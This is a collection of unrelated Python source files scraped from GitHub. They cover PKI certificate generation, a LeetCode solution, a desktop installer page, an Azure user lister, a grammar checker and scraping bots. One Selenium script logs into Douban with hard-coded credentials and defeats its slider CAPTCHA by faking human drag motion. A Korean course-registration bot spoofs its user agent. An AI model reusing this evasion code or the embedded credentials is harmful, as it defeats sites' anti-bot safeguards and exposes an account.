with open("autorite_racine/certificat_racine.pem", "wb") as f:
subject = issuer = x509.Name([
x509.NameAttribute(NameOID.COUNTRY_NAME, u"FR"),
x509.NameAttribute(NameOID.STATE_OR_PROVINCE_NAME, u"France"),
x509.NameAttribute(NameOID.LOCALITY_NAME, u"Paris"),
x509.NameAttribute(NameOID.ORGANIZATION_NAME, u"ESIEA"),
x509.NameAttribute(NameOID.COMMON_NAME, u"Guillaume Paris"),
])
certificat_racine = x509.CertificateBuilder().subject_name(subject
).issuer_name(issuer
).public_key(key.public_key()
).serial_number(x509.random_serial_number()
).not_valid_before(datetime.datetime.utcnow()
).not_valid_after(datetime.datetime.utcnow() + datetime.timedelta(days=10)
).sign(key, signature, default_backend())
f.write(certificat_racine.public_bytes(serialization.Encoding.PEM))
# Créer son autorité d'enregistrement: demande de certificat
if not os.path.exists("autorite_enregistrement"):
os.makedirs("autorite_enregistrement")
with open("autorite_enregistrement/demande_certificat.pem", "wb") as f:
subject = x509.Name([
x509.NameAttribute(NameOID.COUNTRY_NAME, u"US"),
x509.NameAttribute(NameOID.STATE_OR_PROVINCE_NAME, u"Etats-Unis"),
x509.NameAttribute(NameOID.LOCALITY_NAME, u"Milwaukee"),
x509.NameAttribute(NameOID.ORGANIZATION_NAME, u"Université de Milwaukee"),
x509.NameAttribute(NameOID.COMMON_NAME, u"Bill Miller"),
])
demande = x509.CertificateSigningRequestBuilder().subject_name(subject
).sign(key, signature, default_backend())
f.write(demande.public_bytes(serialization.Encoding.PEM))
# Créer un certificat signé par l'autorité racine
certificat = x509.CertificateBuilder().subject_name(demande.subject
).issuer_name(certificat_racine.subject
).public_key(key.public_key()
).serial_number(x509.random_serial_number()
).not_valid_before(datetime.datetime.utcnow()
).not_valid_after(datetime.datetime.utcnow() + datetime.timedelta(days=10)
).sign(key, signature, default_backend())
with open("certificat.pem", "wb") as f:
f.write(certificat.public_bytes(serialization.Encoding.PEM))
# Parser le certificat
print("Emeteur: {}".format(certificat.issuer))
print("Sujet: {}".format(certificat.subject))
print("Algorithme de signature: {}".format(certificat.signature_hash_algorithm))
print("Clé publique: {}".format(certificat.public_key()))
print("Numéro de série: {}".format(certificat.serial_number))
print("Début de validité: {}".format(certificat.not_valid_before))
print("Fin de validité: {}".format(certificat.not_valid_after)) | Tr0llope/PKI_Python | ProjetCryptoV1-0.py | ProjetCryptoV1-0.py | py | 4,477 | python | en | code | 0 | github-code | 50 |
34884744439 | # -*- coding: utf-8 -*-
# @Time : 2021/9/12 11:03
# @Author : XDD
# @File : 可呼唤矩形的组数.py
from functools import reduce
class Solution:
def interchangeableRectangles(self, rectangles) -> int:
# 哈希,依次遍历计算长宽比
dic = {} # key:为长宽比,value为个数,通过计算排列组合数得到最终的结果
n = len(rectangles)
for i in range(n):
ratio = rectangles[i][0] / rectangles[i][1]
if ratio in dic:
dic[ratio] += 1
else:
dic[ratio] = 1
ans = 0
# 遍历字典, values = 1, 则 没有可以配对的 Cm2
for _, value in dic.items():
if value == 1:
ans += 0
else:
ans += reduce(lambda x, y: x * y, range(1, value + 1)) / (
2 * reduce(lambda x, y: x * y, range(1, value - 1)))
return ans
sol = Solution()
print(sol.interchangeableRectangles([[1,7],[2,8],[8,8],[2,5],[2,8],[7,4]]))
| Dong98-code/leetcode | codes/competition/可呼唤矩形的组数.py | 可呼唤矩形的组数.py | py | 1,047 | python | en | code | 0 | github-code | 50 |
1168399995 | from molsysmt._private.digestion import digest
@digest(form='openmm.Modeller')
def to_openmm_System(item, atom_indices='all', structure_indices='all',
forcefield=None, non_bonded_method='no_cutoff', non_bonded_cutoff='1.0 nm', constraints=None,
rigid_water=True, remove_cm_motion=True, hydrogen_mass=None, switch_distance=None,
flexible_constraints=False):
from . import to_openmm_Topology
from ..openmm_Topology import to_openmm_System as openmm_Topology_to_openmm_System
tmp_item = to_openmm_Topology(item, atom_indices=atom_indices, structure_indices=structure_indices)
tmp_item = openmm_Topology_to_openmm_System(tmp_item, forcefield=forcefield,
non_bonded_method=non_bonded_method, non_bonded_cutoff=non_bonded_cutoff,
constraints=constraints, rigid_water=rigid_water, remove_cm_motion=remove_cm_motion,
hydrogen_mass=hydrogen_mass, switch_distance=switch_distance,
flexible_constraints=flexible_constraints,
**kwargs)
return tmp_item
| uibcdf/MolSysMT | molsysmt/form/openmm_Modeller/to_openmm_System.py | to_openmm_System.py | py | 1,268 | python | en | code | 11 | github-code | 50 |
16477507408 | from gi.repository import Gtk
import gettext
import locale
import os
import logging
import sys
from gtkbasebox import GtkBaseBox
# Useful vars for gettext (translations)
APP_NAME = "thus"
LOCALE_DIR = "/usr/share/locale"
import misc.i18n as i18n
class Language(GtkBaseBox):
def __init__(self, params, prev_page="None", next_page="location"):
super().__init__(self, params, "language", prev_page, next_page)
# Set up list box
self.listbox = self.ui.get_object("listbox")
self.listbox.connect("row-selected", self.on_listbox_row_selected)
self.listbox.set_selection_mode(Gtk.SelectionMode.BROWSE)
data_dir = self.settings.get('data')
self.current_locale = locale.getdefaultlocale()[0]
self.language_list = os.path.join(data_dir, "locale", "languagelist.txt.gz")
self.set_languages_list()
image1 = self.ui.get_object("image1")
image1.set_from_file(os.path.join(data_dir, "images/languages.png"))
label = self.ui.get_object("welcome_label")
label.set_name("WelcomeMessage")
def on_listbox_row_selected(self, listbox, listbox_row):
""" Someone selected a different row of the listbox """
if listbox_row is not None:
for vbox in listbox_row:
for label in vbox.get_children():
current_language, sorted_choices, display_map = i18n.get_languages(self.language_list)
lang = label.get_text()
lang_code = display_map[lang][1]
self.set_language(lang_code)
def translate_ui(self):
""" Translates all ui elements """
txt = _("Welcome to Manjaro")
txt = "<span weight='bold' size='large'>{0}</span>".format(txt)
self.title.set_markup(txt)
txt_bold = _("Notice: The Thus Installer is beta software.")
# FIXME: Can't use an a html tag in the label. Causes an accessible GTK Assertion
txt = _("Thus is pre-release beta software that is under active development. \n" \
"It does not yet properly handle RAID, btrfs subvolumes, or other \n" \
"advanced setups. Please proceed with caution as data loss is possible! \n\n" \
"If you find any bugs, please report them at http://bugs.manjaro.org")
txt_markup = "<span weight='bold'>{0}</span>\n\n{1}".format(txt_bold, txt)
label = self.ui.get_object("welcome_label")
label.set_markup(txt_markup)
def langcode_to_lang(self, display_map):
# Special cases in which we need the complete current_locale string
if self.current_locale not in ('pt_BR', 'zh_CN', 'zh_TW'):
self.current_locale = self.current_locale.split("_")[0]
for lang, lang_code in display_map.items():
if lang_code[1] == self.current_locale:
return lang
def set_languages_list(self):
""" Load languages list """
try:
current_language, sorted_choices, display_map = i18n.get_languages(self.language_list)
except FileNotFoundError as file_error:
logging.error(file_error)
sys.exit(1)
current_language = self.langcode_to_lang(display_map)
for lang in sorted_choices:
box = Gtk.VBox()
label = Gtk.Label()
label.set_markup(lang)
box.add(label)
self.listbox.add(box)
if current_language == lang:
self.select_default_row(current_language)
def set_language(self, locale_code):
if locale_code is None:
locale_code, encoding = locale.getdefaultlocale()
try:
lang = gettext.translation(APP_NAME, LOCALE_DIR, [locale_code])
lang.install()
# Translate buttons
txt = _("Forward")
self.forward_button.set_label(txt)
txt = _("Close")
self.exit_button.set_label(txt)
txt = _("Back")
self.backwards_button.set_label(txt)
self.translate_ui()
except IOError:
logging.warning(_("Can't find translation file for the {0} language".format(locale_code)))
def select_default_row(self, language):
for listbox_row in self.listbox.get_children():
for vbox in listbox_row.get_children():
label = vbox.get_children()[0]
if language == label.get_text():
self.listbox.select_row(listbox_row)
return
def store_values(self):
lang = ""
listbox_row = self.listbox.get_selected_row()
if listbox_row is not None:
for vbox in listbox_row:
for label in vbox.get_children():
lang = label.get_text()
current_language, sorted_choices, display_map = i18n.get_languages(self.language_list)
if len(lang) > 0:
self.settings.set("language_name", display_map[lang][0])
self.settings.set("language_code", display_map[lang][1])
return True
def prepare(self, direction):
self.translate_ui()
# Enable forward button
self.forward_button.set_sensitive(True)
# Hide backwards button
self.backwards_button.hide()
self.show_all()
# When testing, no _() is available
try:
_("")
except NameError as err:
def _(message):
return message
if __name__ == '__main__':
from test_screen import _, run
run('Language')
| manjaro/thus | thus/language.py | language.py | py | 5,536 | python | en | code | 24 | github-code | 50 |
21355271077 | """
Author(s):
Miguel Alex Cantu
Date: 04/21/2020
Description:
This function will return a dictionary of all the users
in the tenant, indexed by userPrincipalName
"""
# Imports
from make_request import paginate
from test_cases import TestCases
# Variables
# This query fetches all of the users along with the attributes defined
# in the select filter
GRAPH_USERS_URI = (
"https://graph.microsoft.com/v1.0"
"/users"
"?$select="
"accountEnabled,"
"companyName,"
"country,"
"createdDateTime,"
"displayName,"
"id,"
"jobTitle,"
"mail,"
"officeLocation,"
"onPremisesExtensionAttributes,"
"onPremisesSamAccountName,"
"usageLocation,"
"userPrincipalName,")
def list_all_users(config, app, parsed_args):
user_data = []
paginate(GRAPH_USERS_URI,
user_data,
'value',
config,
app,
parsed_args,
test_data=TestCases().get_test_user_graph_data())
# Converting data to dictionary indexed by UPN
users = {}
for user in user_data:
users[user["userPrincipalName"]] = user
return users
| alextricity25/AzurePythonScripts | list_all_users.py | list_all_users.py | py | 1,224 | python | en | code | 1 | github-code | 50 |
23136949539 | """
使用selenium破解豆瓣滑块验证码
"""
from selenium import webdriver
# 导入鼠标事件类
from selenium.webdriver import ActionChains
import time
# 加速度函数
def get_tracks(distance):
"""
拿到移动轨迹,模仿人的滑动行为,先匀加速后匀减速
匀变速运动基本公式:
①v=v0+at
②s=v0t+½at²
"""
# 初速度
v = 0
# 单位时间为0.3s来统计轨迹,轨迹即0.3内的位移
t = 0.3
# 位置/轨迹列表,列表内的一个元素代表0.3s的位移
tracks = []
# 当前的位移
current = 0
# 到达mid值开始减速
mid = distance*4/5
while current < distance:
if current < mid:
# 加速度越小,单位时间内的位移越小,模拟的轨迹就越多越详细
a = 2
else:
a = -3
# 初速度
v0 = v
# 0.3秒内的位移
s = v0*t+0.5*a*(t**2)
# 当前的位置
current += s
# 添加到轨迹列表
tracks.append(round(s))
# 速度已经达到v,该速度作为下次的初速度
v = v0 + a*t
return tracks
# tracks: [第一个0.3秒的移动距离,第二个0.3秒的移动距离,...]
# 1.打开浏览器,进入豆瓣
driver = webdriver.Chrome()
driver.get(url='https://www.douban.com/')
# 2.切换iframe子页面 - switch_to.frame(...)
iframe_node = driver.find_element_by_xpath('//div[@class="login"]/iframe')
driver.switch_to.frame(iframe_node)
# 3.找到 密码登录、用户名、密码、登录豆瓣按钮 执行对应的操作
driver.find_element_by_xpath('/html/body/div[1]/div[1]/ul[1]/li[2]').click()
driver.find_element_by_xpath('//*[@id="username"]').send_keys('13916319522')
driver.find_element_by_xpath('//*[@id="password"]').send_keys('5201314')
driver.find_element_by_xpath('/html/body/div[1]/div[2]/div[1]/div[5]/a').click()
time.sleep(5)
# 4.验证码又是一个新的iframe,继续切换iframe到验证码子页面
driver.switch_to.frame('tcaptcha_iframe')
# 5.按住滑块,先快速移动一段距离(比如180个像素)
click_node = driver.find_element_by_xpath('//*[@id="tcaptcha_drag_button"]')
ActionChains(driver).click_and_hold(click_node).perform()
ActionChains(driver).move_to_element_with_offset(click_node, xoffset=172, yoffset=0).perform()
# 6.使用加速度函数来移动剩下的距离(比如30个像素)
# tracks: [第一个0.3s的位移, 第二个0.3s的位移,... ...]
tracks = get_tracks(25)
for track in tracks:
ActionChains(driver).move_by_offset(xoffset=track, yoffset=0).perform()
# 延迟释放鼠标
time.sleep(1)
ActionChains(driver).release().perform()
| sjk052026/test2020 | spider/day26/doubanSpiderSelenlum.py | doubanSpiderSelenlum.py | py | 2,676 | python | zh | code | 0 | github-code | 50 |
15675857824 | #!/usr/bin/env python
import json
import logging
from gi.repository import WebKit
from gi.repository import GObject
class Browser(GObject.GObject):
"""Webkit browser wrapper to exchange messages with Gtk.
:param uri: URI to the HTML file to be displayed.
:type uri: str
"""
__gsignals__ = {
'message-received': (GObject.SIGNAL_RUN_FIRST, None, (object,))
}
def __init__(self, uri):
# Initialize to be able to emit signals
GObject.GObject.__init__(self)
self.widget = WebKit.WebView()
self.widget.open(uri)
self.widget.connect('title-changed', self.title_changed_cb)
@property
def size(self):
"""Return size of the browser widget.
:returns: Browser widget width and height
:rtype: tuple(int, int)
"""
rectangle = self.widget.get_allocation()
return (rectangle.width, rectangle.height)
def title_changed_cb(self, _widget, _frame, title):
"""Put window title in the message queue.
Window title changes are received as an event in the Gtk interface.
This is used as a hack to make it possible to send messages from webkit
to Gtk.
:param title: Window title
:type title: str
"""
logging.debug('title changed: %r', title)
message = json.loads(title)
self.emit('message-received', message)
def send(self, message):
"""Send message from Gtk to WebKit.
:param message: javascript code to execute in the browser widget
:type message: str
"""
logging.debug('(Gtk -> WebKit) %s', message)
self.widget.execute_script(message)
# Register to be able to emit signals
GObject.type_register(Browser)
| jcollado/pygtk-webui | browser.py | browser.py | py | 1,769 | python | en | code | 4 | github-code | 50 |
13039300169 | #Import tkinter for GUI libraries
import tkinter as Tkinter
from tkinter import *
import string
#Import tkMessageBox for information and help message box
import tkinter.messagebox as tkMessageBox
def helpMsg():
tkMessageBox.showinfo("About this Software", "This software is is intended to increase proper usage of english without Error")
#Import nltk for language processing
from nltk import *
#Check to see if relevant text exists
try:
sentence = "example sentence"
tokens = word_tokenize(sentence)
#If it doesn't, download it
except LookupError:
print("Downloading requisite English language processing code...")
download('book')
#Convert a list of tuples (word, part of speech) to a sentence String
def tagsToString(tags):
result = ""
for x in tags:
word = x[0]
pos = x[1]
if pos == '.' or word[0]=="'":
result+=word
else:
result+=" "+word
result = result.strip()
result = " "+result
return result
#Process text to detect if a noun is found preceding an adjective:
def Error1(tags):
error = False
if len(tags) < 2:
return error
adj = ['JJ']
nouns = ['NN','NNS','NNP','NNPS','PRP','RP','DT']
for i in range(len(tags)-1):
currentWord = tags[i][0]
currentPOS = tags[i][1]
nextWord = tags[i+1][0]
nextPOS = tags[i+1][1]
if currentPOS in nouns and nextPOS in adj:
tags[i] = (nextWord, nextPOS)
tags[i+1] = (currentWord, currentPOS)
error = True
return error
#Process text to detect if a gerund is used without 'to be':
def Error2a(tags):
error = False
flag = 0
if len(tags) < 2:
print ("Hemant 1")
return error
nouns = ['NN','NNS','NNP','NNPS','PRP','RP']
verbs = ['VB','VBD','VBG','VBN','VBP','VBZ','MD']
capitals = "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
tagsLength = len(tags) - 1
for i in range(tagsLength):
print ("Hemant 2")
firstWord = tags[i][0]
print ("Hemant 2a")
print (firstWord)
firstPOS= tags[i][1]
print ("Hemant 2b")
print (firstPOS)
secondWord = tags[i+1][0]
print ("Hemant 2c")
print (secondWord)
secondPOS = tags[i+1][1]
print ("Hemant 2d")
print (secondPOS)
print ("for is am")
print (tags[i][0])
print (tags[i+1][0])
if tags[i][1] in ['VBD','VBG','VBP','VBZ'] and tags[i+1][1] in ['VBD','VBG','VBP','VBZ']:
print ("in if cond")
tags.remove(tags[i+1])
break
if firstPOS in nouns and tags[i][0] not in capitals:
print ("Here")
newword = tags[i][0].capitalize()
tags.remove(tags[i])
tags.insert(i,(newword,'NN'))
break
if secondPOS in ['VBD','VBG','VBP','VBZ'] and firstPOS not in verbs:
for j in range(i,len(tags)):
print ("Hemant 2e @@@@@")
print (tags[j][0])
print (tags[j][1])
if tags[j][0] == '.':
if firstWord in ['I']:
print ("Hemant 3")
if tags[i+1][0] not in ['Am','am','like','liked','can','could','had','have','will','would','love','loved','see','saw','hate','hated','want','wanted','need','needed','own','owned','belong','hear','heard','smell','seem','seemed','know','knew','believe','believed','remember','remembered','doubt','doubted','dislike','disliked','understand','understood','suspect','suspected','loath','loathed','forget','forgot','prefer','preferred','feel']:
tags.insert(i+1,('am','VBP'))
flag = 1
error = True
break
elif firstWord in ['He','he','She','she']:
print ("Hemant 4")
if tags[i+1][0] not in ['Is','is','like','liked','can','could','had','have','will','would','love','loved','see','saw','hate','hated','want','wanted','need','needed','own','owned','belong','hear','heard','smell','seem','seemed','know','knew','believe','believed','remember','remembered','doubt','doubted','dislike','disliked','understand','understood','suspect','suspected','loath','loathed','forget','forgot','prefer','preferred', 'feel']:
tags.insert(i+1,('is','VBP'))
flag = 1
error = True
break
elif firstWord in ['They','they','We','we','You','you']:
if tags[i+1][0] not in ['Are','are','like','liked','can','could','had','have','will','would','love','loved','see','saw','hate','hated','want','wanted','need','needed','own','owned','belong','hear','heard','smell','seem','seemed','know','knew','believe','believed','remember','remembered','doubt','doubted','dislike','disliked','understand','understood','suspect','suspected','loath','loathed','forget','forgot','prefer','preferred','start','started','feel']:
tags.insert(i+1,('are','VBP'))
flag = 1
error = True
break
elif tags[j][0] == '?':
if firstWord in ['I']:
print ("Hemant 6")
if tags[i+1][0] not in ['Am','am']:
tags.insert(i,('am','VBP'))
flag = 1
error = True
break
elif firstWord in ['He','he','She','she']:
print ("Hemant 7")
print (tags[i+1][0])
if tags[i+1][0] not in ['Is','is']:
tags.insert(i,('is','VBP'))
flag = 1
error = True
break
elif firstWord in ['They','they','We','we','You','you']:
if tags[i+1][0] not in ['Are','are','Will','will']:
tags.insert(i,('are/will','VBP'))
flag = 1
error = True
break
if flag == 1:
break
return error
#Process text to find if an extraneous modal is used with 'do'
def Error2b(tags):
error = False
if len(tags) < 2:
return error
verbs = ['VB','VBD','VBG','VBN','VBP','VBZ','MD']
do = ['do','Do','does','Does']
for i in range(len(tags)-2):
firstWord = tags[i][0]
firstPOS = tags[i][1]
secondWord = tags[i+1][0]
secondPOS = tags[i+1][1]
thirdWord = tags[i+2][0]
thirdPOS = tags[i+2][1]
if firstWord in do and secondPOS == 'MD':
tags[i+1] = (('',''))
error = True
elif firstWord in do and thirdPOS == 'MD':
tags[i+2] = (('',''))
error = True
while (('','')) in tags:
tags.remove(('',''))
return error
#Add punctuation to the sentence where it does not exist:
def Error3a(tags):
error = False
if len(tags) < 2:
print ("Hemant 3a 1")
return error
capitals = "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
question=["Who","What","Where","When","Why","How","who","what","where","when","why","how","Is","Are","is","are","Do","do","Should","May","Could","should","may","could","would","Would","Does","do"]
print ("Questionmark condition")
print (tags[0][0])
print (tags[len(tags)-1][0])
if tags[0][0] in question and tags[len(tags)-1][0] != '?':
print ("Add questionmark")
i = len(tags) - 1
tags.remove(tags[i])
tags.append(('?','.'))
error = True
if tags[-1][1] != ('.'):
for x in range(len(tags)-1,-1,-1):
if tags[x][1] in ['.','?','!']:
print ("Hemant 3a 2")
break
if x != 0:
print ("Hemant 3a 3")
x += 1
if tags[x][0] in question:
print ("Hemant 3a 4")
tags.append(('?','.'))
else:
print ("Hemant 3a 5")
tags.append(('.','.'))
error = True
for i in range(len(tags)-1):
print ("Hemant 3a 6")
currentWord = tags[i][0]
currentPOS = tags[i][1]
nextWord = tags[i+1][0]
nextPOS = tags[i+1][1]
if nextPOS != 'NNP' and nextWord != "I" and nextWord[0] in capitals and currentPOS != '.':
for x in range(i,-1,-1):
if tags[x][1] in ['.','?','!']:
print ("Hemant 3a 7")
break
if x != 0:
print ("Hemant 3a 8")
x += 1
if tags[x][0] in question:
print ("Hemant 3a 9")
tags.insert(i+1,('?','.'))
else:
print ("Hemant 3a 10")
tags.insert(i+1,('.','.'))
error = True
verbs = ['VB','VBD','VBG','VBN','VBP','VBZ','MD']
fanboys = ['for','and','nor','but','or','yet','so','because','while','although','therefore','thus']
addCommas = []
left = False
right = True
for i in range(len(tags)-1):
print ("Hemant 3a 11")
currentWord = tags[i][0]
currentPOS = tags[i][1]
if currentWord in fanboys:
for j in range(i,len(tags)):
if tags[j][1] in verbs:
print ("Hemant 3a 12")
right = True
break
elif tags[j][1] == '.':
print ("Hemant 3a 13")
break
for j in range(i,-1,-1):
if tags[j][1] in verbs:
print ("Hemant 3a 14")
left = True
break
elif tags[j][1] == '.':
print ("Hemant 3a 15")
break
if left and right:
print ("Hemant 3a 16")
error = True
addCommas.append(i)
for loc in addCommas:
print ("Hemant 3a 17")
tags.insert(loc,(',','.'))
removeCommas = []
for i in range(len(tags)-1):
if tags[i][0] == ',' and tags[i+1][0] not in fanboys:
print ("Hemant 3a 18")
removeCommas.append(i)
error = True
for loc in removeCommas:
print ("Hemu")
print (tags[loc])
del tags[loc]
error = False
print (error)
break
nouns = ['NN','NNS','NNP','NNPS','PRP','RP']
print (error)
for i in range(len(tags)-1):
print (error)
if tags[i][0][-1] == 's' and tags[i][0][-2] != "'" and tags[i+1][1] in nouns:
print ("Hemant 3a 19")
tags[i] = (tags[i][0][:-1]+"'"+tags[i][0][-1],tags[i][1])
error = True
print (tags[-3][0])
if tags[-2][0] == 'please' and tags[-1][0] == "?":
print ("Hemant 3a 20")
tags.insert(-2,(',','.'))
error = True
print (error)
break
print (error)
return error
#Capitalize letters in words at the beginning of a sentence:
def Error3b(tags):
error = False
if len(tags) < 2:
return error
capitals = "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
punctuation = ".!?"
nouns = ['NN','NNS','NNP','NNPS','PRP','RP']
for i in range(len(tags)-1):
currentWord = tags[i][0]
nextWord = tags[i+1][0]
if (i == 0 or currentWord == 'i') and currentWord[0] not in capitals:
newWord = currentWord.capitalize()
tags[i] = (newWord,tags[i][1])
error = True
elif currentWord in punctuation and nextWord[0] not in capitals:
newWord = nextWord.capitalize()
tags[i+1] = (newWord,tags[i+1][1])
error = True
return error
#Correct usage of A/An
def Error3c(tags):
error = False
if len(tags) < 2:
return error
a = ['a','A']
an = ['an','An']
vowels = 'aeiouAEIOU'
for i in range(len(tags)-1):
currentWord = tags[i][0]
nextWord = tags[i+1][0]
if currentWord in a and nextWord[0] in vowels:
newWord = an[a.index(currentWord)]
tags[i] = (newWord,tags[i][1])
error = True
elif currentWord in an and nextWord[0] not in vowels:
newWord = a[an.index(currentWord)]
tags[i] = (newWord,tags[i][1])
error=True
return error
#Correct genitive construction errors:
def Error4(tags):
print ("4")
error = False
if len(tags) < 3:
print( "4a")
return error
nouns = ['NN','NNS','NNP','NNPS','PRP','RP']
for i in range(len(tags)-2):
print( "4b")
firstWord = tags[i][0]
firstPOS = tags[i][1]
secondWord = tags[i+1][0]
secondPOS = tags[i+1][1]
thirdWord = tags[i+2][0]
thirdPOS = tags[i+2][1]
if secondWord == 'the' and firstPOS in nouns and thirdPOS in nouns:
tags[i] = (secondWord,secondPOS)
tags[i+1] = (thirdWord,thirdPOS)
tags[i+2] = (firstWord,firstPOS)
tags.insert(i+2,("'s", 'POS'))
error=True
return error
#Master function which calls all of the error checks and which
#prints the evolving structure of the sentence for debugging
def checkErrors(text):
errors = ""
print("Sentence:")
print(text)
tokens = word_tokenize(text)
print("Tokens:")
print(tokens)
tags = pos_tag(tokens)
print("Original:")
print(tags)
e3a = Error3a(tags)
print("Punctuation correction:")
print(tags)
e3b = Error3b(tags)
print("Capitalization correction:")
print(tags)
e1 = Error1(tags)
print("Noun preceding adjective correction:")
print(tags)
e2a = Error2a(tags)
print("Omission of verb 'to be' in gerund correction:")
print(tags)
e2b = Error2b(tags)
print("Extraneous use of modal verb with 'do' correction:")
print(tags)
e3c = Error3c(tags)
print("A/An correction:")
print(tags)
e4 = Error4(tags)
print("Genitive construction correction:")
print(tags)
if e1:
errors += " Adjective cannot succeed noun.\n"
if e2a:
errors += " Verb 'to be' is needed with a gerund.\n"
if e2b:
errors += " A modal verb is not needed with 'do'.\n"
if e3a:
errors += " Punctuation must be in its proper place. Place a comma to seperate clauses, full-stop at the end of the sentence, and question mark at the end of questions.\n"
if e3b:
errors += " The beginning of sentences and proper nouns must be capitalized.\n"
if e3c:
errors += " Improper use of articles, use 'An' before noun starting with vowels, 'A' otherwise.\n"
if e4:
errors += " The genitive construction uses a possessive.\n"
fixedText = tagsToString(tags)
if errors == "":
errors = " It looks good as long as your sentence is in the present tense. Good job."
L6.config(fg='green')
top.update()
else:
L6.config(fg='red')
return (fixedText,errors)
#Master function which analyses text
def analyze():
text = T1.get("1.0",END)
fixedText, errors = checkErrors(text)
fixedText = fixedText.split()
for index in range(1, len(fixedText)):
if fixedText[index] != 'I':
if len(fixedText[index])>1 :
if (fixedText[index][0] in string.ascii_uppercase and
fixedText[index][1] in string.ascii_uppercase) : continue
else :
l = len(fixedText[index-1])
if fixedText[index-1][l-1] != '.' :
fixedText[index] = fixedText[index].lower()
else :
if fixedText[index][0] in string.ascii_uppercase :
l = len(fixedText[index-1])
if fixedText[index-1][l-1] != '.' :
fixedText[index] = fixedText[index].lower()
fixedText = ' '.join(fixedText)
if fixedText[0] not in string.ascii_uppercase:
if fixedText[0] in string.ascii_lowercase:
tmp = fixedText[:1]
tmp = tmp.upper()
fixedText = tmp + fixedText[1:]
#errors = checkErrors(text)
L3v.set("\n Suggestion:\n")
L4v.set(fixedText)
L5v.set("\n Misused grammatical rules that may help you:\n")
L6v.set(errors)
#Helper function which centers window
def center(win):
win.update_idletasks()
width = win.winfo_width()
height = win.winfo_height()
x = (win.winfo_screenwidth() // 2) - (width // 2)
y = (win.winfo_screenheight() // 2) - (height // 2)
win.geometry('{}x{}+{}+{}'.format(width, height, x, y))
#User interface code
top = Tk()
top.title("Learn English More Effectively by Avoiding Typical Mistakes")
top.geometry('800x800')
L1 = Label(top, text="\n Please type your sentence here:\n", font=("Helvetica", 14))
L1.pack(anchor=W)
T1 = tkinter.Text(top,height=4,width=60,font=("Helvetica", 14))
T1.pack()
L2 = Label(top, text="", font=("Helvetica", 14))
L2.pack()
B1 = Button(top, text=" Check ", command=analyze,font=("Helvetica", 14))
B1.pack()
L3v = StringVar()
L3 = Label(top, textvariable=L3v, font=("Helvetica", 14, "bold"))
L3.pack(anchor=W)
L4v = StringVar()
L4 = Label(top, textvariable=L4v, font=("Helvetica", 14), justify=LEFT, wraplength=800)
L4.pack(anchor=W)
L5v = StringVar()
L5 = Label(top, textvariable=L5v, font=("Helvetica", 14, "bold"))
L5.pack(anchor=W)
L6v = StringVar()
L6 = Label(top, textvariable=L6v, fg="red", font=("Helvetica", 12), justify=LEFT, wraplength=800)
L6.pack(anchor=W)
B2 = Tkinter.Button(top, text = "?", command = helpMsg)
B2.pack()
center(top)
top.mainloop()
| hmansoori002/GrammerUp | GrammerUp.py | GrammerUp.py | py | 17,985 | python | en | code | 0 | github-code | 50 |
7369861512 |
## iterative approach
class node:
def __init__(self,data):
self.data = data
self.next = None
class Linkedlist:
def __init__(self):
self.head = None
def reverseiterative(self,head):
if head == None or head.next == None: return
prev = None
present = head
future = head.next
while future.next:
present.next = prev
prev = present
present = future
future = future.next
present.next = prev
future.next = present
return future ## head
def push(self, new_data):
new_node = node(new_data)
new_node.next = self.head
self.head = new_node
def printlist(self):
temp = self.head
while(temp != None):
print(temp.data,end=" ")
temp = temp.next
llist = Linkedlist()
llist.push(20)
llist.push(4)
llist.push(15)
llist.push(85)
llist.printlist()
print("")
llist.head = llist.reverseiterative(llist.head)
llist.printlist()
######################################
| sanket1105/DSA-with-Python | DSA/LinkedLists/ReverseLinkedList.py | ReverseLinkedList.py | py | 1,160 | python | en | code | 16 | github-code | 50 |
21167839945 | from matplotlib import pyplot as plt
plt.figure(figsize=(5, 2.5))
distance = 0
velocity = 50
a = -9.8
def integrate_dist ():
max_height = 0
global distance
global a
global velocity
for t in range (0,100,1):
distance += velocity
if (max_height < distance):
max_height = distance
if(distance + velocity <0):
plt.scatter(t,distance, s=100, c='r')
plt.pause(0.01)
break
plt.scatter(t, distance, s=5, c='r')
plt.pause(0.01)
integrate_velocity(a)
print("Max Height = %2.2f"% max_height)
def integrate_velocity (acceleration):
global velocity
velocity += acceleration
integrate_dist() | smkim0508/Engineering_Applications_Prog | Ballistics_1_4.py | Ballistics_1_4.py | py | 654 | python | en | code | 0 | github-code | 50 |
30485090726 | '''
수강신청 실패를 만회하기 위해 제작하였습니다.
제작자: 박결
최종 업데이트: 2023-02-06
기능 1. 수강바구니에 담긴 과목들을 자동으로 새로고침하며 수강신청을 시도합니다.
기능 2. (선택) 수강신청이 성공할 경우 슬랙봇을 통해 사실을 알려줍니다.
'''
from selenium import webdriver
from selenium.webdriver.common.by import By
import chromedriver_autoinstaller
import requests
import time
import json
import os
from user_agent import generate_user_agent
userAgent = generate_user_agent(os='win', device_type="desktop")
headers = {"User-Agent":userAgent,
"Accept-Language":"ko-KR,ko;q=0.8,en-US;q=0.5,en;q=0.3"}
options = webdriver.ChromeOptions()
options.add_argument(headers)
options.add_argument("--disable-gpu")
# Check if chrome driver is installed or not
chrome_ver = chromedriver_autoinstaller.get_chrome_version().split('.')[0]
driver_path = f'./{chrome_ver}/chromedriver.exe'
if os.path.exists(driver_path):
print(f"chrom driver is insatlled: {driver_path}")
else:
print(f"install the chrome driver(ver: {chrome_ver})")
chromedriver_autoinstaller.install(True)
driver_path = chromedriver_autoinstaller.install()
def getUserInfo():
with open('myInfo.json', 'r', encoding='utf-8') as f:
json_data = json.load(f)
user_id = json_data["information"]["ID"]
user_pw = json_data["information"]["PW"]
hook = json_data["slack-bot"]["hook"]
if hook is None:
hook = False
return user_id, user_pw, hook
class GetCourses:
def __init__(self, user_id, user_pw, hook, driver):
'''
user_id : 학번
user_pw : 비밀번호
hook : 슬랙봇 url
'''
self.user_id = user_id,
self.user_pw = user_pw,
self.hook = hook
self.driver = driver
def sendMessage(self, lectureName):
'''
수강 신청을 성공할 때 슬랙으로 메시지를 보내는 메서드
'''
hook = self.hook
title = '수강 신청 성공'
content = f"<{lectureName}> 과목을 잡았습니다~!"
# 메시지 전송
requests.post(
hook,
headers={'content-type':'application/json'},
json={
'text' : title,
'blocks': [
{
'type':'section', # 메시지가 묶이지 않도록 section을 사용함
'text':{
'type':'mrkdwn',
'text':content
}
}
]
}
)
def getSugangUrl(self):
'''
수강신청 사이트로 접근하는 메서드
'''
self.driver.get('https://sugang.skhu.ac.kr/')
